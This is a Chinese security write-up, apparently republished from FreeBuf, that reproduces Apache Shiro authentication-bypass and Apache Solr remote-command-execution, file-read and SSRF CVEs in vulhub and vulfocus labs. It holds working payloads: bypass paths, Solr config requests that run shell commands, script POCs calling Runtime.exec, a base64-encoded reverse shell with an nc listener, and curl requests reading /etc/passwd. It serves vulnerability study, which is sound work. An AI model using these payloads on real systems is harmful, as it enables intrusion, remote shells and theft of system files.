【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

admin 2024年1月6日10:10:09评论28 views字数 6892阅读22分58秒阅读模式

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现


01
中间件列表

中间件及框架列表:

IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等

02
常见开发框架

1、开发框架-PHP-Laravel-Thinkphp

2、开发框架-Javaweb-St2-Spring

3、开发框架-Python-django-Flask

4、开发框架-Javascript-Node.js-JQuery

5、其他框架-Java-Apache Shiro&Apache Sorl

常见语言开发框架:

PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend 等

JAVA:Spring MyBatis Hibernate Struts2 Springboot 等

Python:Django Flask Bottle Turbobars Tornado Web2py 等

Javascript:Vue.js Node.js Bootstrap JQuery Angular 等

03
Apache Shiro-组件框架安全

详解:shiro(java安全框架)

ApacheShiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。

暴露的安全问题

Apache Shiro <= 1.2.4 默认密钥致命令执行漏洞[CVE-2016-4483]

Apache Shiro < 1.3.2 验证绕过漏洞[CVE-2016-2807]

Apache Shiro < 1.4.2 cookie oracle padding 漏洞 [CVE-2019-12442]

Apache Shiro < 1.5.2 验证绕过漏洞 [CVE-2020-1957]

Apache Shiro < 1.5.3 验证绕过漏洞 [CVE-2020-11989]

Apahce Shiro < 1.6.0 验证绕过漏洞 [CVE-2020-13933]

Apahce Shiro < 1.7.1 权限绕过漏洞 [CVE-2020-17523]

......

漏洞复现

Apache Shiro认证绕过漏洞(CVE-2020-1957)

Apache Shiro 是一个功能强大且易于使用的 Java 安全框架,可执行身份验证、授权、加密和会话管理。

在 1.5.2 之前的带有 Spring 动态控制器的 Apache Shiro 版本中,攻击者可以使用来构建恶意构建的请求,从而绕过目录身份验证。..;

影响范围:Apache Shiro < 1.5.3

靶场:vulhub

参考:Apache Shiro认证绕过漏洞(CVE-2020-1957)复现

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

开启环境:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

访问web界面:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

对管理页面的直接请求是不可访问的,将被重定向到登录页面。/admin/

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

构建恶意请求以绕过身份验证检查并访问管理页面。

payload:/xxx/..;/admin/

http://you-ip:8080/xxx/..;/admin/

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

CVE-2020-11989验证绕过漏洞

将Apache Shiro与Spring控制器一起使用时,特制请求可能会导致身份验证绕过。

靶场:vulfocus

开启环境:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

访问web界面:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

Poc:/admin/%20

影响范围:Apache Shiro < 1.7.1

环境可能存在问题,没能跳转绕过。可使用github上的项目进行测试。

项目地址:shiro-cve-2020-17523

下载完成过后构建即可。具体可参考说明文档。

CVE_2016_4437 Shiro-550 && CVE-2019-12422 Shiro-721 漏洞复现

漏洞原理以及复现过程:

shiro反序列化漏洞Shiro-550/Shiro-721反序列化

04
Apache Solr-组件框架安全

详解:Solr详解

Apache Solr 是一个开源的搜索服务,使用 Java 语言开发,主要基于 HTTP 和

Apache Lucene 实现的。Solr 是一个高性能,采用 Java5 开发,基于 Lucene 的全文搜索服务器。

Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。

披露的安全问题

远程命令执行 RCE(CVE-2017-12629)

远程命令执行 XXE(CVE-2017-12629)

任意文件读取 AND 命令执行(CVE-2019-17558)

远程命令执行漏洞(CVE-2019-0192)

远程命令执行漏洞(CVE-2019-0193)

未授权上传漏洞(CVE-2020-13957)

Apache Solr SSRF (CVE-2021-27905)

......

漏洞复现

Apache Solr 远程命令执行漏洞(CVE-2017-12629)

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。

此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。

环境:vulhub

参考:CVE-2017-12629-RCE复现

开启环境:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

访问web界面:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

利用:

首先创建一个listener,其中设置exe的值为我们想执行的命令,args的值是命令参数:

1//数据包内容:
2POST /solr/demo/config HTTP/1.1
3Host: 192.168.100.134:8983
4User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
5Connection: close
6Content-Length: 161
7
8{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c""touch /tmp/rumilc.txt"]}}

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

然后进行update操作,触发刚才添加的listener:

1//数据包内容:
2POST /solr/demo/update HTTP/1.1
3Host: 192.168.100.134:8983
4User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
5Connection: close
6Content-Type: application/json
7Content-Length: 15
8
9[{"id":"test"}]

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

验证:

docker ps 查看容器id

docker exec -it 容器id bash

成功创建

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

可将命令换成反弹shell命令,进行反弹shell,逻辑思路不变,命令需要进行base64编码。

任意文件读取&&命令执行(CVE-2019-17558)

Solr 是基于 Apache Lucene(TM) 构建的流行、超快的开源企业搜索平台。

Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。

靶场:vulfocus

开启环境:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

访问web界面:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

手工复现参考:通过 Velocity 自定义模板的 Apache Solr 远程代码执行

脚本工具:EXP地址

脚本一步到位,命令执行:

1python2 solr_rce.py http://192.168.100.134:14226 id

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

1python2 solr_rce.py http://192.168.100.134:14226 whoami

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

读取/查看文件:

1python2 solr_rce.py http://192.168.100.134:14226 "cat /etc/passwd"

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

远程命令执行漏洞(CVE-2019-0193)

Apache Solr < 8.2.0 版本

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。

靶场:vulhub

参考:Apache Solr 远程命令执行漏洞(CVE-2019-0193)复现

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

开启环境:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

访问web界面:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

刚上来需要进行登录,需要登录之后的状态才可以。

1执行命令:
2docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db

命令执行成功后,需要等待一会,之后访问即可查看到Apache solr的管理页面,无需登录。

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

接下来,首先打开刚刚创建好的核心,选择Dataimport功能并选择debug模式:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

填入以下POC:test

 1<dataConfig>
2  <dataSource type="URLDataSource"/>
3  <script><![CDATA[
4          function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/rumilc.txt");
5          }
6  ]]>
</script>
7  <document>
8    <entity name="stackoverflow"
9            url="https://stackoverflow.com/feeds/tag/solr"
10            processor="XPathEntityProcessor"
11            forEach="/feed"
12            transformer="script:poc" />

13  </document>
14</dataConfig>

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

执行过后,等待一下:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

验证:

1docker ps
2docker exec -it 容器id bash

成功创建

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

可将命令换成反弹shell命令,需要进行base64编码,尝试反弹:

1sh -i >& /dev/tcp/192.168.100.1/8888 0>&1
2编码后:
3bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}

POC:

 1<dataConfig>
2  <dataSource type="URLDataSource"/>
3  <script><![CDATA[
4          function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}");
5          }
6  ]]>
</script>
7  <document>
8    <entity name="stackoverflow"
9            url="https://stackoverflow.com/feeds/tag/solr"
10            processor="XPathEntityProcessor"
11            forEach="/feed"
12            transformer="script:poc" />

13  </document>
14</dataConfig>

监听端开启监听

1nc -lvvp 8888

执行过后,稍等一下:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

成功反弹shell:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

Solr 任意文件读取&& SSRF (CVE-2021-27905)

Apache Solr 是一个开源搜索服务器。该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。当 Apache Solr 不启用身份验证时,攻击者可以直接构建请求以启用特定配置,并最终导致 SSRF 或任意文件读取。

靶场:vulhub

参考:Apache Solr RemoteStreaming 任意文件读取和 SSRF

开启环境:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

访问web界面:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

利用:

1//首先,访问提取数据库名称:
2http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

发送如下请求,修改数据库配置启用:demoRemoteStreaming

 1//数据包如下:
2POST /solr/demo/config HTTP/1.1
3Host: 192.168.100.134:8983
4User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
5Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
6Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
7Accept-Encoding: gzip, deflate, br
8DNT: 1
9Connection: close
10Upgrade-Insecure-Requests: 1
11Content-Type: application/json
12Content-Length: 80
13
14{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

发送数据包:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

然后通过以下方式读取任意文件:stream.url

1//curl -i -s -k 'http://your-ip:8983/solr/demo/debug/dump     param=ContentStreams&stream.url=file:///etc/passwd'
2
3curl -i -s -k "http://your-ip:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd"

成功读取:

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

查看组信息:

1curl -i -s -k "http://your-ip:8983/solr/demo/debug/dump? 
2param=ContentStreams&stream.url=file:///etc/group"

【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

其他开发框架安全问题以及漏洞复现:

框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现


END
【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

文:rumilc 来源:FreeBuf.COM

原文链接:https://www.freebuf.com/articles/web/382559.html

版权声明:著作权归作者所有。如有侵权请联系删除

原文始发于微信公众号(开源聚合网络空间安全研究院):【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月6日10:10:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【框架安全】CVE 复现&Apache Shiro&Apache Solr漏洞复现https://cn-sec.com/archives/2364491.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息